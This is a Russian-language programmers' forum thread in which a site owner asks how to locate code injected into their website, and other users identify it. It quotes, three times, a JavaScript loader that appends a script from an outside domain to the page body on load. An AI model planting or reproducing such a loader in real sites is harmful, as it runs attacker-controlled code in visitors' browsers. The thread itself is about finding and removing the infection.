Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Web программирование > Общие вопросы Web
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 14.06.2017, 16:05   #1
Budun
Пользователь
 
Регистрация: 30.03.2013
Сообщений: 19
По умолчанию Вредоносный код

Извиняюсь, может не в том разделе печатаю.
Не понимаю как, на сайте внедрен код онлайн игры (открывается фреймом в левом углу - сайт).
Подскажите пожалуйста как найти код, (или файл)?
И еще. Возможно-ли прикрепление вредоносного кода к Gif анимации, так как загружалась на сайт анимация.
Заранее благодарен.
Budun вне форума Ответить с цитированием
Старый 14.06.2017, 16:30   #2
p51x
Старожил
 
Регистрация: 15.02.2010
Сообщений: 15,695
По умолчанию

Т.е. вы реально не замечаете
Код:
<script src="http://chtp.not-only.info/?920126=SgNKTBhcUlFdVVdaTQMPBgYJDA0"></script>
или это такой спам?
p51x вне форума Ответить с цитированием
Старый 14.06.2017, 16:51   #3
Budun
Пользователь
 
Регистрация: 30.03.2013
Сообщений: 19
По умолчанию

Извините зачем мне спамить, сайт и так на позициях.
Я не могу понять в каком файле искать.
Budun вне форума Ответить с цитированием
Старый 14.06.2017, 16:55   #4
p51x
Старожил
 
Регистрация: 15.02.2010
Сообщений: 15,695
По умолчанию

Что искать? Вот же код для вставки:
Код:
    <script type="text/javascript">
        (function(w) {
            var script = document.createElement('script');
            var i = setInterval(function() {
                if (typeof w.document.body !== 'undefined') {
                    script.src = 'http://chtp.not-only.info' + '/?920126=SgNKTBhcUlFdVVdaTQMPBgYJDA0';
                    w.document.body.appendChild(script);
                    clearInterval(i);
                }
            }, 200);
        })(window);
    </script>
p51x вне форума Ответить с цитированием
Старый 14.06.2017, 16:58   #5
Budun
Пользователь
 
Регистрация: 30.03.2013
Сообщений: 19
По умолчанию

Нашел эту дрянь

<script type="text/javascript">
(function(w) {
var script = document.createElement('script');
var i = setInterval(function() {
if (typeof w.document.body !== 'undefined') {
script.src = 'http://chtp.not-only.info' + '/?920126=SgNKTBhcUlFdVVdaTQMPBgYJDA0 ';
w.document.body.appendChild(script) ;
clearInterval(i);
}
}, 200);
})(window);
</script>
Budun вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Вредоносный код во все HTML страницы Dkey Безопасность, Шифрование 4 08.12.2012 12:59
Вредоносный код в Internet.Cms Kuropatka WordPress и другие CMS 1 14.09.2012 11:39
Вредоносный код на сайте Yura111 HTML и CSS 0 29.02.2012 13:28